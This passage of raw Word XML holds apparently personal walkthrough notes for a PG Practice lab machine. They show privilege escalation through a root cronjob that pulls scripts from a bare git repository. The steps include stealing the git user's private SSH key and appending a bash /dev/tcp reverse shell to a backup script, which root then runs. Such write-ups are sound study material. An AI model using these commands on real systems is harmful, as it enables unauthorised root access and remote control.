        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003237">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="806"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They cloned a local git repo instead of a remote git repo. The local git repo was a bare Git repository (basically the backend database of Git). Bare repos don’t have a working copy of the files — they just store Git objects, refs, and history.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003238">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="806"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So we had to clone local repo in order to see the files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003239">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="806"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then they set up git identity by using git config and putting in username and email</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000323A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="806"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then they had to login to another user named git</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000323B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="806"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then they had permissions to commit and push the change back into the server’s bare repo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000323C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="806"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They ran git add and git push</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000323D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="806"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And the cron job ran the malicious file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000323E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000323F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003240">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is a summary of the attack:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003241">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003242">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Local Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003243">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="182"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Running LinPEAS showed a suspicious cronjob owned by root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="182"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This cronjob executed two scripts (pull.sh every 2 minutes and backups.sh every 3 minutes).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003245">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="182"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The scripts were stored in a Git repository (/git-server), and the cronjob was pulling updates from that repo before running them.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003246">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003247">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Git Repository Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003248">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="817"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The directory /git-server turned out to be a bare Git repo (not a normal working folder).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003249">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="817"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bare repos don’t have files you can directly edit; instead, they’re like databases that store Git history and are meant to be pushed/pulled from.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000324A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="817"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To work with it, the attacker cloned it locally using:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000324B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="817"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git clone file:///git-server/ /tmp/git-server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000324C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="817"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This created a normal working directory with the tracked files, including backups.sh.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000324D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000324E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Initial Modification Attempts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000324F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1075"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The attacker added a harmless line (touch /tmp/gitscript-test) to backups.sh and committed it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003250">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1075"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But when they tried to push the change back to /git-server, it failed — they didn’t have the right permissions as their current user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003251">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003252">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Lateral Movement to git User</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003253">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="827"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">While exploring further, they found /home/git/.ssh/id_rsa, the private SSH key for the git user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003254">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="827"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since it had read permissions, they exfiltrated it to their Kali machine with scp, fixed the permissions (chmod 600 id_rsa), and logged in as git:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003255">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="827"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -i id_rsa -p 43022 git@192.168.93.125</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003256">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="827"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This dropped them into a git-shell, a restricted shell designed for Git-only interaction (push, pull, clone).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003257">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003258">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Repo Access as git</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003259">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="979"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now authenticated as git, they could properly interact with the /git-server repo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000325A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="979"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They cloned it again, but this time using the git user and SSH:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000325B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="979"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GIT_SSH_COMMAND='ssh -i id_rsa -p 43022' git clone git@192.168.93.125:/git-server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000325C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000325D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Malicious Code Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000325E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Inside the working copy, they edited backups.sh to add a reverse shell payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000325F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo 'sh -i &gt;&amp; /dev/tcp/[kali_IP]/8080 0&gt;&amp;1' &gt;&gt; backups.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003260">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then they committed and pushed the change back into the server’s bare repo:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003261">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git add -A</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003262">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git commit -m "pwn"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003263">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GIT_SSH_COMMAND='ssh -i id_rsa -p 43022' git push origin master</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003264">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003265">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Cronjob Execution as Root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003266">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="752"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On the target machine, the root-owned cronjob was running pull.sh and backups.sh.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003267">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="752"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pull.sh ensured the local copy of the repo on the target stayed in sync (i.e., did a git pull).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003268">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="752"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
